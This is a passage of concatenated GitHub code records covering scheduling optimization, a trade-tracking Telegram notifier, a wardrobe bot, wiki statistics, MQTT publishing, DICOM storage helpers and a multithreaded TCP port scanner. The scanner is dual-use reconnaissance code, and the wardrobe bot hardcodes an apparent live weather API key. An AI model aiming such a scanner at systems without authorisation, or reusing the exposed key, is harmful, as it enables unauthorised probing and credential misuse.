end_time))\n return machine_time, job_time, machine_work_time\n\n@njit(fastmath=True) \ndef filter_tasks(x, tasks, n_operations, n_machines):\n n = tasks.shape[0]\n operations = np.empty((n_operations,4))\n j = 0\n last = tasks[0]\n last_i = 0\n for i in range(n+1):\n if i == n or tasks[i][0] != last[0] or tasks[i][1] != last[1]: # new operation\n m = i - last_i\n sel_i = int(x[j]*10*n_machines) % m\n selected = tasks[last_i + sel_i]\n operations[j,:] = selected\n last_i = i\n j += 1\n if i < n: \n last = tasks[i]\n return operations\n\n@njit(fastmath=True)\ndef filtered_tasks(x, task_data, n_operations, n_machines, job_indices, job_ids):\n operations = filter_tasks(x, task_data, n_operations, n_machines)\n order = np.argsort(x[n_operations:])\n tasks = reorder(operations, order, n_operations, job_ids, job_indices)\n return tasks\n\nclass fitness: \n\n def __init__(self, task_data, bounds, n_jobs, n_operations, n_machines, name):\n self.evals = mp.RawValue(ct.c_long, 0) # writable across python processes\n self.best_y = mp.RawValue(ct.c_double, np.inf) # writable across python processes\n self.t0 = time.perf_counter()\n self.task_data = task_data \n self.n_jobs = 
n_jobs\n self.n_operations = n_operations\n self.n_machines = n_machines \n self.bounds = bounds\n self.name = name\n self.nobj = 3\n self.ncon = 0\n self.weights = np.array([1.0, 0.02, 0.001]) # only used for single objective optimization\n self.job_indices, self.job_ids = job_indices(task_data)\n \n def chart(self, x):\n tasks = filtered_tasks(x, self.task_data, self.n_operations, self.n_machines,\n self.job_indices, self.job_ids)\n chart(tasks, self.n_jobs, self.n_machines)\n \n def fun(self, x): # multi objective function \n tasks = filtered_tasks(x, self.task_data, self.n_operations, self.n_machines,\n self.job_indices, self.job_ids)\n machine_time, job_time, machine_work_time = exec_tasks(tasks, self.n_jobs, self.n_machines)\n span = np.amax(machine_time)\n work = np.sum(machine_work_time)\n wmax = np.amax(machine_work_time)\n ys = np.array([span, work, wmax]) \n y = sum(self.weights*ys) # weighted sum \n self.evals.value += 1\n if y < self.best_y.value:\n self.best_y.value = y \n logger.info(\"evals = {0}: time = {1:.1f} y = {2:.2f} s = {3:.0f} w = {4:.0f} m = {5:.0f} m= {6:s} j= {7:s} w= {8:s}\"\n .format(self.evals.value, dtime(self.t0), y, span, work, wmax,\n str([int(si) for si in machine_time]),\n str([int(oi) for oi in job_time]),\n str([int(oi) for oi in machine_work_time]),\n ))\n return ys \n\n def __call__(self, x): # single objective function \n ys = self.fun(x)\n return sum(self.weights*ys) # weighted sum \n \ndef optall(multi_objective = True):\n for i in range(1,16):\n optimize(i, multi_objective)\n\ndef optimize(bi, multi_objective = True): \n name = \"BrandimarteMk\" + str(bi)\n tasks, n_jobs, n_machines, n_operations, _ = read_fjs(\"data/1_Brandimarte/\" + name + \".fjs\")\n \n dim = 2*n_operations\n lower_bound = np.zeros(dim)\n lower_bound[:] = 0.0000001 \n upper_bound = np.zeros(dim)\n upper_bound[:] = 0.9999999\n bounds = Bounds(lower_bound, upper_bound)\n \n fit = fitness(tasks, bounds, n_jobs, n_operations, n_machines, name)\n if multi_objective:\n xs, front = modecpp.retry(fit.fun, fit.nobj, fit.ncon, fit.bounds, num_retries=32, popsize = 48, \n max_evaluations = 960000, nsga_update = True, workers=16)\n logger.info(name + \" modecpp.retry(num_retries=32, popsize = 48, max_evals = 960000, nsga_update = True, workers=16\" )\n logger.info(str([tuple(y) for y in front]))\n else: \n store = retry.Store(fit, bounds) \n logger.info(name + \" Bite_cpp(960000,M=1).minimize, num_retries=256)\" )\n retry.retry(store, Bite_cpp(960000,M=1).minimize, num_retries=256) \n \n return fit, xs\n \ndef main():\n #optall(multi_objective = True)\n fit, xs = optimize(1, multi_objective = True)\n fit.chart(xs[0]) \n \nif __name__ == '__main__':\n main()","repo_name":"dietmarwo/fast-cma-es","sub_path":"examples/jobshop.py","file_name":"jobshop.py","file_ext":"py","file_size_in_byte":10155,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"40"} +{"seq_id":"41138660592","text":"#!/usr/bin/python3.9\n\nfrom lxml import html \nfrom datetime import datetime, timedelta \nfrom dateutil import parser \n\nimport requests \nimport cx_Oracle \nimport json \n\nexec(open('config.py').read())\n\ndef get_last_trade_date(): \n sql = \"select max(trade_date) from ark_trade\" \n cursor = conn.cursor() \n cursor.execute(sql) \n lastdate, = cursor.fetchone() \n cursor.close() \n return lastdate\n\ndef save_trade(arkTrade, lastdate):\n parm={\n \"ticker\": \"A\",# None,\n \"date\": None,\n \"shares\": None,\n \"weight\": None,\n \"fund\": None,\n \"direction\": 
None,\n \"hidden\": None}\n\n for atk in arkTrade.keys():\n parm[atk]=arkTrade.get(atk)\n\n parm[\"date\"] = parser.parse(parm.get(\"date\")[0:10])\n\n if (parm[\"date\"] > lastdate):\n sql = \"\"\"insert into ark_trade\n (ticker , trade_date, shares, weight,\n fund, direction, hidden) values \n (:1, :2, :3, :4, :5, :6, :7)\"\"\"\n #(:ticker , :date, :shares, weight, \n # :fund, :direction, :hidden) \"\"\"\n\n cursor = conn.cursor()\n cursor.execute(sql, [\n parm.get(\"ticker\"), \n parm.get(\"date\"),\n int(parm.get(\"shares\")),\n float(parm.get(\"weight\")),\n parm.get(\"fund\"),\n parm.get(\"direction\"),\n parm.get(\"hidden\")])\n\n cursor.close()\n conn.commit()\n\ndef notify_trade():\n sql = \"\"\"\n /*with function theoffset return number\n as\n oset number; \n begin\n select trunc(sysdate)-max(trade_date) into oset from ark_trade;\n return oset;\n end;\n */\n with last_info as (\n select trunc(sysdate)-max(trade_date) theoffset,\n max(trade_date) last_date\n from ark_trade\n )\n select last_date, listagg(distinct direction, '/') within group \n (order by direction) directions,\n t.ticker || ': ' ||\n sum((dir_value+1)*days_within_1)/2 || ',' ||\n -sum((dir_value-1)*days_within_1)/2 || ',' ||\n sum(shares*dir_value*days_within_1) || '; ' ||\n sum((dir_value+1)*days_within_7)/2 || ',' ||\n -sum((dir_value-1)*days_within_7)/2 || ',' ||\n sum(shares*dir_value*days_within_7) || '; ' ||\n sum((dir_value+1)*days_within_31)/2 || ',' ||\n -sum((dir_value-1)*days_within_31)/2 || ',' ||\n sum(shares*dir_value*days_within_31) || '; ' ||\n listagg(distinct fund, ',') within group (order by fund) rec\n from (\n select last_date, t.*,\n case when trade_date > sysdate-1-theoffset \n then 1 else 0 end days_within_1,\n case when trade_date > sysdate-7-theoffset \n then 1 else 0 end days_within_7,\n case when trade_date > sysdate-31-theoffset \n then 1 else 0 end days_within_31,\n decode(direction, 'Buy', 1, 'Sell', -1) dir_value\n from ark_trade t, last_info\n where trade_date > sysdate-31-theoffset\n ) t\n group by last_date, ticker\n having sum(days_within_1) > 0\n order by directions\n \"\"\"\n cursor = conn.cursor()\n cursor.execute(sql)\n prevdir=\"\"\n message = \"\"\n for last_date, direction, details in cursor:\n if direction != prevdir:\n if prevdir != \"\":\n message=\"```\\n\" + prevdir + \" Operations 31 days within \" + str(last_date) + \": \\r\" + message + \"\\n```\"\n request_url=\"https://api.telegram.org/bot\" + botapikey + \"/sendMessage?chat_id=\" + chatid + \"&parse_mode=MarkdownV2&text=\" + message\n page = requests.get(request_url)\n message =\"\"\n prevdir = direction \n message = message + \"\\n\" + details \n\n if message != \"\": \n message=\"```\\n\" + prevdir + \" Operations 31 days within \" + str(last_date) + \": \\r\" + message + \"\\n```\"\n request_url=\"https://api.telegram.org/bot\" + botapikey + \"/sendMessage?chat_id=\" + chatid + \"&parse_mode=MarkdownV2&text=\" + message\n page = requests.get(request_url)\n\ndef notify_trade_old(lastdate):\n sql = \"\"\"select direction, ticker,\n listagg(fund) within group (order by fund) funds, sum(shares) total_shares, count(*) num_trades\n from ark_trade\n where trade_date>:1\n group by direction, ticker\n order by direction, ticker\"\"\"\n\n cursor = conn.cursor()\n cursor.execute(sql, [lastdate])\n #cursor.execute(sql)\n for direction, ticker, funds, total_shares, num_trades in cursor:\n message=direction + \",\" + ticker + \",\" + str(total_shares) + \",\" + str(num_trades)\n 
request_url=\"https://api.telegram.org/bot\" + botapikey + \"/sendMessage?chat_id=\" + chatid + \"&text=\" + message\n page = requests.get(request_url)\n\n print(message)\n\n cursor.close()\n\n request_url=\"https://api.telegram.org/bot\" + botapikey + \"/sendMessage?chat_id=\" + chatid + \"&text=\" + \"Sent trades since \" + str(lastdate)\n page = requests.get(request_url)\n print(request_url)\n return lastdate\n\n\n\ndef get_update_id(tbody, fund):\n ribbon = tbody.xpath('//div[@class=\"ant-ribbon-wrapper\"]')\n\n update_date = parser.parse(ribbon[0].xpath('//div[contains(@class, \"ant-ribbon-placement-end\")]')[0].text, fuzzy=True) + timedelta(hours=8)\n\n\n#update_id_wrapper = cursor.var(cx_Oracle.NUMBER)\n#sql_params = { \"update_id\" : update_id_wrapper }\n#sql = \"insert into ark_update_tbl ( update_date ) values (sysdate) \" + \\\n# \"returning update_id into :update_id\"\n#cursor.execute(sql, sql_params)\n#update_id=update_id_wrapper.getvalue()\n\n#print(update_id[0])\n\n cursor = conn.cursor()\n sql = \"select count(*) from ark_update_tbl \" + \\\n \"where update_date=:update_date \" + \\\n \"and fund = :fund\"\n cursor.execute(sql, (update_date, fund))\n c, = cursor.fetchone()\n cursor.close()\n\n if c > 0:\n return -1\n\n\n cursor = conn.cursor()\n update_id_wrapper = cursor.var(cx_Oracle.NUMBER)\n sql_params = { \"update_date\": update_date, \n \"fund\": fund, \n \"update_id\" : update_id_wrapper }\n update_id = -1\n sql = \"insert into ark_update_tbl ( update_date, fund ) values \" + \\\n \"(:update_date, :fund) \" + \\\n \"returning update_id into :update_id\"\n cursor.execute(sql, sql_params)\n update_id = update_id_wrapper.getvalue()\n cursor.close()\n\n print (update_id)\n return update_id[0]\n \n\ndef capture_holdings(fund, start_col):\n url=\"https://cathiesark.com/\" + fund + \"/complete-holdings\"\n if fund == \"ark-funds-combined\":\n fund = \"COMBINED\"\n else:\n fund = fund.upper()\n \n \n page = requests.get(url)\n tree = html.fromstring(page.content)\n\n tbody = tree.xpath('//tbody')[0]\n\n jsontext = tree.xpath('//script[@id=\"__NEXT_DATA__\"]')[0].text\n pp = json.loads(jsontext).get(\"props\").get(\"pageProps\")\n\n\n\n for k in pp.keys():\n print(k)\n maxposcnt = -1\n maxposkey = \"\"\n if k == \"DISABLEarkPositions\":\n print (k, \": \")\n #f = open(\"arkPositionsKeys.txt\", \"a\")\n f = open(\"arkPositionsKeys_nxpi.txt\", \"w\")\n for i in range(0, len(pp.get(k))-1):\n arkPos = pp.get(k)[i]\n # Step 1: Check Key list\n #for apk in arkPos.keys():\n # f.write(apk + '\\n')\n # Step 2: Check ticker with most keys\n #if len(arkPos) > maxposcnt:\n # maxposcnt = len(arkPos)\n # maxposkey = arkPos.get(\"ticker\")\n # Step 3: List keys\n # Table will be created based on this\n if arkPos.get(\"ticker\") == \"NXPI\":\n for apk in arkPos.keys():\n f.write(apk + '\\n')\n f.close()\n print(maxposkey + \": \" + str(maxposcnt))\n\n if k == \"arkTrades\":\n print (k, \": \")\n last_date = get_last_trade_date()\n for i in range(0, len(pp.get(k))-1):\n arkPos = pp.get(k)[i]\n save_trade(arkPos, last_date)\n\n #notify_trade_old(last_date)\n notify_trade()\n# for kk in arkPos.keys():\n# for kk in arkPos.keys():\n# print (kk, arkPos.get(kk))\n\n \n# else:\n# print (k, pp.get(k))\n\nconn = cx_Oracle.connect(\"\", \"\", dbconnect)\ncapture_holdings(\"ark-funds-combined\", 
1)\n\n\n","repo_name":"tsangsir/ArkTracker","sub_path":"capture_cathieark.py","file_name":"capture_cathieark.py","file_ext":"py","file_size_in_byte":8716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71619237240","text":"# -*- coding: utf-8 -*-\n\nimport telebot\nfrom flask import request\n\nfrom models import User, Clothes\n\nfrom app import db, app\n\nfrom func import func\n\nfrom values import values, types\n\nimport pyowm\n\nimport os\n\ntoken = os.environ.get('TELEGRAM_TOKEN', '')\nbot = telebot.TeleBot(token, threaded=False)\n\nURL = 'https://api.telegram.org/bot' + token + '/'\nsecret = ''\nurl = 'https://3b3b95dc.ngrok.io' + secret\n# bot.remove_webhook()\n# bot.set_webhook(url=url)\nstates = {'start': 1, 'init': 2, 'query': 3, 'add': 4, 'city': 5, 'del': 6}\n\nmarkup = telebot.types.ReplyKeyboardMarkup(one_time_keyboard=False, resize_keyboard=True)\nitembtn1 = telebot.types.KeyboardButton('Получить список одежды')\nitembtn2 = telebot.types.KeyboardButton('Добавит предмет в гардероб')\nitembtn3 = telebot.types.KeyboardButton('Удалить предмет')\nitembtn4 = telebot.types.KeyboardButton('Установить город')\nitembtn5 = telebot.types.KeyboardButton('Подобрать одежду на сегодня')\nmarkup.row(itembtn1, itembtn2)\nmarkup.row(itembtn3, itembtn4)\nmarkup.row(itembtn5)\n\nowm = pyowm.OWM('370baafacdbb4a1468e5cef4e6c46a5e')\n\n\n@app.route('/' + secret, methods=['POST'])\ndef webhook():\n update = telebot.types.Update.de_json(request.stream.read().decode('utf-8'))\n bot.process_new_updates([update])\n return 'ok', 200\n\n\n@bot.message_handler(commands=['start'])\ndef start(message):\n user = User.query.filter(User.id == message.chat.id).first()\n if user is None:\n user = User(message.chat.id, message.chat.username)\n user.state = states['start']\n\n try:\n db.session.add(user)\n db.session.commit()\n except:\n db.session.rollback()\n bot.send_message(message.chat.id,\n 'что-то пошло не так')\n return\n\n bot.send_message(message.chat.id,\n f'Здравствуйте, {user.username}. 
Пожалуйста, введите имеющийся у Вас гардероб в'\n f' формате <Цвет Вид одежды> так, чтобы каждый предмет находился на новой строке')\n\n\n@bot.message_handler(\n func=lambda message: User.query.filter(User.id == message.chat.id).first().state == states['start'] or\n User.query.filter(User.id == message.chat.id).first().state == states['add']\n)\ndef init(message):\n user = User.query.filter(User.id == message.chat.id).first()\n text = message.text\n items = text.split('\\n')\n for item in items:\n new_item = item.split()\n\n if len(new_item) != 2:\n bot.send_message(message.chat.id, 'введите, пожалуйста, все вещи в правильном формате')\n user.state = states['add']\n db.session.commit()\n return\n\n exist = False\n for typ in types:\n if new_item[1] in types[typ]:\n exist = True\n break\n\n if not exist:\n bot.send_message(message.chat.id, 'такой вещи не бывает')\n user.state = states['add']\n db.session.commit()\n return\n\n cloth = Clothes.query.filter_by(color=new_item[0]).filter_by(kind=new_item[1]).first()\n if cloth is None:\n clothes = Clothes(new_item[0], new_item[1])\n for typ in types:\n if new_item[1] in types[typ]:\n clothes.clothes_type = typ\n clothes.points = values[new_item[1]]\n break\n try:\n user.clothes.append(clothes)\n user.state = states['init']\n db.session.commit()\n except:\n db.session.rollback()\n bot.send_message(message.chat.id, 'что-то пошло не так')\n return\n else:\n try:\n user.clothes.append(cloth)\n user.state = states['init']\n db.session.commit()\n except:\n db.session.rollback()\n bot.send_message(message.chat.id, 'что-то пошло не так')\n return\n\n bot.send_message(message.chat.id, 'Вещи успешно добавлены в гардероб', reply_markup=markup)\n\n\n@bot.message_handler(func=lambda message: message.text == 'Получить список одежды')\ndef get_clothes(message):\n user = User.query.filter(User.id == message.chat.id).first()\n clothes = user.clothes\n for clothe in clothes:\n bot.send_message(message.chat.id, clothe, reply_markup=markup)\n\n\n@bot.message_handler(func=lambda message: message.text == 'Добавит предмет в гардероб')\ndef add_item_invite(message):\n user = User.query.filter(User.id == message.chat.id).first()\n user.state = states['add']\n db.session.commit()\n bot.send_message(message.chat.id,\n 'Пожалуйста, введите имеющийся у Вас гардероб в'\n ' формате <Цвет Вид одежды> так, чтобы каждый предмет находился на новой строке')\n\n\n@bot.message_handler(func=lambda message: message.text == 'Установить город')\ndef city(message):\n user = User.query.filter(User.id == message.chat.id).first()\n user.state = states['city']\n db.session.commit()\n bot.send_message(message.chat.id, 'Пожалуйста, введите город')\n\n\n@bot.message_handler(func=lambda message: User.query.filter(User.id == message.chat.id).first().state == states['city'])\ndef add_city(message):\n user = User.query.filter(User.id == message.chat.id).first()\n user.city = message.text\n user.state = states['init']\n db.session.commit()\n bot.send_message(message.chat.id, 'Город успешно добавлен')\n\n\n@bot.message_handler(func=lambda message: message.text == \"Подобрать одежду на сегодня\")\ndef clothes(message):\n user = User.query.filter(User.id == message.chat.id).first()\n if user.city is None:\n bot.send_message(message.chat.id, 'Пожалуйста, установите город, нажав на кнопку'\n ' \"Установить город\"')\n return\n\n clothes = user.clothes\n weather = owm.weather_at_place(f'{user.city},Russia')\n w = weather.get_weather()\n temperature = w.get_temperature(\"celsius\")[\"temp\"]\n 
print(temperature)\n    detail_status = w.get_detailed_status()\n    new_clothes = func(temperature, clothes)\n    for item in new_clothes:\n        bot.send_message(message.chat.id, f'{item}')\n\n\n@bot.message_handler(func=lambda message: User.query.filter(User.id == message.chat.id).first().state == states['init']\n                                          and message.text=='Удалить предмет')\ndef delete(message):\n    user = User.query.filter(User.id == message.chat.id).first()\n    user.state = states['del']\n    clothes = user.clothes\n    for clothe in clothes:\n        bot.send_message(message.chat.id, str(clothe.id) + '. ' + str(clothe), reply_markup=markup)\n    bot.send_message(message.chat.id, 'Пожалуйста, введите номера предметов из списка через пробел'\n                                      ' или введите -1, чтобы удалить все')\n    db.session.commit()\n\n\n@bot.message_handler(func=lambda message: User.query.filter(User.id == message.chat.id).first().state == states['del'])\ndef delete_clothes(message):\n    user = User.query.filter(User.id == message.chat.id).first()\n    if message.text == str(-1):\n        user.clothes = []\n        user.state = states['init']\n        db.session.commit()\n        bot.send_message(message.chat.id, 'Успешно удалены все вещи')\n        return\n\n    try:\n        nums = [int(num) for num in message.text.split()]\n    except ValueError:\n        user.state = states['init']\n        db.session.commit()\n        bot.send_message(message.chat.id, 'Неверный ввод')\n        return\n    clothes = user.clothes\n    for num in nums:\n        clo = list(filter(lambda cl: cl.id == num, clothes))[0]\n        clothes.remove(clo)\n\n    user.state = states['init']\n    db.session.commit()\n    bot.send_message(message.chat.id, 'Предмет удалён')\n\n\n\n","repo_name":"JoelPagliuca/clothes","sub_path":"view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":8561,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"18486668084","text":"# -*- coding: utf-8 -*-\nimport toolforge\nimport json\nimport datetime\nfrom config import domains, siteData\n\ndef doCatQueery(category, namespace):\n    return \"select count(cl_from) as number from categorylinks where cl_to='%s' and cl_from in (select page_id from page where page_namespace=%s)\" % (\n        category, namespace)\n\n\ndef updateJson(domain, num_allpages, num_q0, num_q1, num_q2, num_q3q4, num_q4, num_main_allpages, main_withscan,\n               main_withoutscan, main_apg, page_aps):\n\n    with open(\"Stats.json\", \"r\") as f:  # Open the JSON file for reading\n        data = json.load(f)  # Read the JSON into the buffer\n\n    ## Working with buffered content\n    data[domain][\"Num_of_pages\"] = num_allpages\n    data[domain][\"Without_text\"] = num_q0\n    data[domain][\"Not_proofread\"] = num_q1\n    data[domain][\"Problematic\"] = num_q2\n    data[domain][\"Proofread\"] = num_q3q4\n    data[domain][\"Validated\"] = num_q4\n    data[domain][\"Main_Pages\"] = num_main_allpages\n    data[domain][\"Main_WithScan\"] = main_withscan\n    data[domain][\"Main_WithOutScan\"] = main_withoutscan\n    data[domain][\"Main_APS\"] = main_apg\n    data[domain][\"Page_APS\"] = page_aps\n\n    # Save our changes to JSON file\n    with open(\"Stats.json\", \"w+\") as f:\n        json.dump(data, f, indent=4)\n\nfor domain in domains:\n    dbname = domain + 'wikisource_p'\n\n    conn = toolforge.connect( dbname )\n    cur = conn.cursor()\n\n    pageNsCode = siteData[domain]['namespace']['page']\n\n    # Get all page in Page namespace\n    num_allpages = \"select count(page_id) as number from page where page_namespace=%s and page_is_redirect=0\" % pageNsCode\n    cur.execute( num_allpages )\n    row = cur.fetchone()\n    num_allpages = int(row[0])\n\n    # Get Q0\n    cur.execute( &#13;
doCatQueery( siteData[domain]['category']['Without_text'], pageNsCode) )\n row = cur.fetchone()\n num_q0 = int(row[0])\n\n # Get Q1\n cur.execute( doCatQueery( siteData[domain]['category']['Not_proofread'], pageNsCode) )\n row = cur.fetchone()\n num_q1 = int(row[0])\n\n # Get Q2\n cur.execute( doCatQueery( siteData[domain]['category']['Problematic'], pageNsCode) )\n row = cur.fetchone()\n num_q2 = int(row[0])\n\n # Get Q3\n cur.execute( doCatQueery( siteData[domain]['category']['Proofread'], pageNsCode) )\n row = cur.fetchone()\n num_q3 = int(row[0])\n\n # Get Q4\n cur.execute( doCatQueery( siteData[domain]['category']['Validated'], pageNsCode) )\n row = cur.fetchone()\n num_q4 = int(row[0])\n\n # Get main namespace's total pages\n num_main_allpages = \"select count(distinct page_id) from page where page_namespace=0 and page_is_redirect=0;\"\n cur.execute( num_main_allpages )\n row = cur.fetchone()\n num_main_allpages = int(row[0])\n\n # Get main namespace's with scan\n main_withscan = \"select count(distinct tl_from) as num from templatelinks left join page on page_id=tl_from where tl_namespace=%d and page_namespace=0;\"%pageNsCode\n cur.execute( main_withscan )\n row = cur.fetchone()\n main_withscan = int(row[0])\n\n #Get Disambiguation pages\n q_disamb = \"select count(page_title) from page where page_namespace = 0 and page_is_redirect = 0 and page_id in (select pp_page from page_props where pp_propname = 'disambiguation')\"\n cur.execute(q_disamb)\n row = cur.fetchone ()\n num_disambig = int(row[0])\n\n # Get main namespace's without scan\n main_withoutscan = num_main_allpages - main_withscan - num_disambig\n\n # Get Average Page Size\n main_apg = \"select avg(page_len) from page where page_namespace = 0;\"\n cur.execute(main_apg)\n row = cur.fetchone()\n main_apg = int(row[0])\n\n page_aps = \"select avg(page_len) from page where page_namespace = %d;\" % pageNsCode\n cur.execute(page_aps)\n row = cur.fetchone()\n page_aps = int(row[0])\n\n updateJson(domain, num_allpages, num_q0, num_q1, num_q2, num_q3 + num_q4, num_q4, num_main_allpages,\n main_withscan, main_withoutscan, main_apg, page_aps)\n\n cur.close ()\n conn.close ()\n\n# timestamp\nwith open(\"Stats.json\", \"r\") as f: # Open the JSON file for reading\n data = json.load(f) # Read the JSON into the buffer\n\ndata[\"timestamp\"] = datetime.datetime.now().strftime(\"%A, %d. 
%B %Y %I:%M%p\")\n\nwith open(\"Stats.json\", \"w\") as f:\n    json.dump(data, f, sort_keys=True, indent=4)","repo_name":"indictechcom/indic-wsstats","sub_path":"gen_stats.py","file_name":"gen_stats.py","file_ext":"py","file_size_in_byte":4626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"9422454996","text":"# pip install paho-mqtt\n\nimport paho.mqtt.client as mqtt\nimport time\nimport json\nimport random\n\n# *********************************************************************\n# MQTT Config\n\ndataChnId1 = \"Temperature\"\ndataChnId2 = \"Humidity\"\nMQTT_SERVER = \"52.206.47.47\"\nMQTT_PORT = 1883\nMQTT_ALIVE = 60\nMQTT_TOPIC1 = \"mosquitto/\" + dataChnId1\nMQTT_TOPIC2 = \"mosquitto/\" + dataChnId2\n\n# *********************************************************************\n\nmqtt_client = mqtt.Client()\nmqtt_client.connect(MQTT_SERVER, MQTT_PORT, MQTT_ALIVE)\t\n\nwhile True:\n    h0 = random.randint(0,30)\n    t0 = random.randint(0,30)\n    payload = {\"dataChnId\":dataChnId1,\"value\":t0}\n    print(dataChnId1 + \" : \" + str(t0))\n    mqtt_client.publish(MQTT_TOPIC1, json.dumps(payload), qos=1)\n    payload = {\"dataChnId\":dataChnId2,\"value\":h0}\n    print(dataChnId2 + \" : \" + str(h0))\n    mqtt_client.publish(MQTT_TOPIC2, json.dumps(payload), qos=1)\n    time.sleep(10)","repo_name":"ArcherHuang/Data-Visualization","sub_path":"Code/Python3/mosquitto_mqtt.py","file_name":"mosquitto_mqtt.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"72931626681","text":"import socket\nimport argparse\nfrom tqdm import tqdm\nimport concurrent.futures\nimport art\nimport ipaddress\nimport sys\n\n\n#清理掉http和https\ndef clean_url(url):\n    if url.startswith(\"http://\"):\n        url = url[7:]\n    elif url.startswith(\"https://\"):\n        url = url[8:]\n    return url\n\ndef get_ip_address(url):\n    try:\n        ip = ipaddress.ip_address(url)\n        return str(ip)\n    except ValueError:\n        try:\n            ip_address = socket.gethostbyname(url)\n            return ip_address\n        except socket.gaierror:\n            print(f\"无法解析主机名:{url}\")\n            sys.exit(1)\n\n\n# 扫描单个端口的函数\ndef scan_port(ip_address,port):\n    try:\n        with socket.socket(socket.AF_INET,socket.SOCK_STREAM) as s:\n            s.settimeout(1)\n            result = s.connect_ex((ip_address,port))\n            if result == 0:\n                return port\n    except socket.error:\n        pass\n    return None\ndef scan_ports(ip_address, num_threads, min_port, max_port):\n    open_ports = []\n    ports_to_scan = range(min_port, max_port + 1)\n    with concurrent.futures.ThreadPoolExecutor(max_workers=num_threads) as executor:\n        futures = [executor.submit(scan_port, ip_address, port) for port in ports_to_scan]\n        with tqdm(total=len(ports_to_scan), desc=\"扫描端口\") as bar:\n            for i, future in enumerate(concurrent.futures.as_completed(futures)):\n                result = future.result()\n                if result is not None:\n                    open_ports.append(result)\n                bar.update(1)\n    return open_ports\n\n# 获得端口对应的服务器名称的函数\n\ndef get_service_name(port):\n    try:\n        service_name = socket.getservbyport(port)\n        return service_name\n    except OSError:\n        return \"Unknown\"\n\ndef print_ascii_art():\n    ascii_art = art.text2art(\"Zero URLscanner\")\n    print(ascii_art)\n\nif __name__ == \"__main__\":\n\n    print_ascii_art()\n\n    print(\"欢迎来到Zero老师写的第一个URlscanner工具\")\n    print(\"-----------------------------------------------------------\")\n    print(\"请你享用\")\n    print(\"-----------------------------------------------------------\")\n    print('输入-h获得提示')\n    parser = argparse.ArgumentParser(description=\"Zero &#13;
URLscanner - 作者:zzm\")\n    parser.add_argument(\"-u\",\"--url\",required=True,help=\"要扫描单个ip或者URl\")\n    parser.add_argument(\"-t\",\"--threads\",type=int,default=4,help=\"线程数(不超过700)\")\n    parser.add_argument(\"-min\",type=int,default=1,help=\"开始扫描端口\")\n    parser.add_argument(\"-max\",type=int,default=65535,help='截止的端口号')\n    args = parser.parse_args()\n\n\n# 限制线程不超过700\n    num_threads = min(args.threads,700)\n    url = args.url\n    url = clean_url(url)\n    host_name = url.split('/')[0]\n    ip_address = get_ip_address(host_name)\n    print(f\"{host_name}的ip地址:{ip_address}\")\n\n    open_ports = scan_ports(ip_address, num_threads, args.min, args.max)\n    print(f\"\\n{host_name} ({ip_address}) 的开放端口:\")\n    if open_ports:\n        for port in open_ports:\n            service_name = get_service_name(port)\n            print(f\"端口 {port} ({service_name}) 是开放的\")\n    else:\n        print('没有找到开放的端口')\n\n\n\n","repo_name":"tlpzzm/URLscanner","sub_path":"URLscanner.py","file_name":"URLscanner.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"40"}
{"seq_id":"6187033201","text":"\"\"\"Utilities for reading and writing objects to/from Google Cloud.\"\"\"\nfrom io import BytesIO\n\nfrom google.cloud import storage\n\nimport pydicom\n\n\ndef read_dataset_from_blob(\n    bucket: storage.Bucket,\n    blob_name: str,\n    stop_before_pixels: bool = False,\n) -> pydicom.Dataset:\n    \"\"\"Read a pydicom Dataset from a bucket.\n\n    Parameters\n    ----------\n    bucket: storage.Bucket\n        Bucket object where the blob is stored.\n    blob_name: str\n        Name of the blob within the bucket.\n    stop_before_pixels: bool\n        Whether to stop before reading in the pixel data. I.e. return metadata\n        only.\n\n    Returns\n    -------\n    pydicom.Dataset\n        Dataset loaded from the specified blob.\n\n    \"\"\"\n    blob = bucket.get_blob(blob_name)\n    dcm_bytes = blob.download_as_bytes()\n    dcm = pydicom.dcmread(\n        BytesIO(dcm_bytes),\n        stop_before_pixels=stop_before_pixels,\n    )\n    return dcm\n\n\ndef write_dataset_to_blob(\n    dataset: pydicom.Dataset,\n    bucket: storage.Bucket,\n    blob_name: str\n) -> None:\n    \"\"\"Write a pydicom Dataset to a bucket.\n\n    Parameters\n    ----------\n    dataset: pydicom.Dataset\n        Dataset object to upload.\n    bucket: storage.Bucket\n        Bucket object where the blob should be stored.\n    blob_name: str\n        Name of the blob within the bucket. &#13;
If it already exists, it will be\n overwritten.\n\n \"\"\"\n blob = bucket.blob(blob_name)\n with BytesIO() as buf:\n dataset.save_as(buf)\n buf.seek(0)\n blob.upload_from_file(buf)\n","repo_name":"ImagingDataCommons/idc-pan-cancer-annotations-conversion","sub_path":"src/idc_annotation_conversion/cloud_io.py","file_name":"cloud_io.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"693603977","text":"import sys\n\nn = int(sys.stdin.readline().rstrip())\narr = [int(sys.stdin.readline().rstrip()) for _ in range(n)]\n\narr1 = [0]*n\nresult = [0]*n\n\nfor i in arr:\n arr1[i] += 1\n\nfor i in range(1, len(arr1)):\n arr1[i] += arr1[i-1]\n\nfor i in arr:\n result[arr1[i]-1] = i\n arr1[i] -= 1\n\nfor i in result:\n print(i)\n","repo_name":"PKL-2022/KTY_Algorithm","sub_path":"Algorithmstudy/11.정렬/10989 (수 정렬하기3).py","file_name":"10989 (수 정렬하기3).py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7495634813","text":"TC = int(input())\n\ndef func(cx, cy, r):\n global cnt\n # 출발점과 도착점이 원 안에 있는 경우 count\n # (x-a)^2 + (y-b)^2 < r**2\n if (x1 - cx) ** 2 + (y1 - cy) ** 2 < r ** 2:\n cnt += 1\n if (x2 - cx) ** 2 + (y2 - cy) ** 2 < r ** 2:\n cnt += 1\n\n # 출발점과 도착점이 같은 원 안에 있을 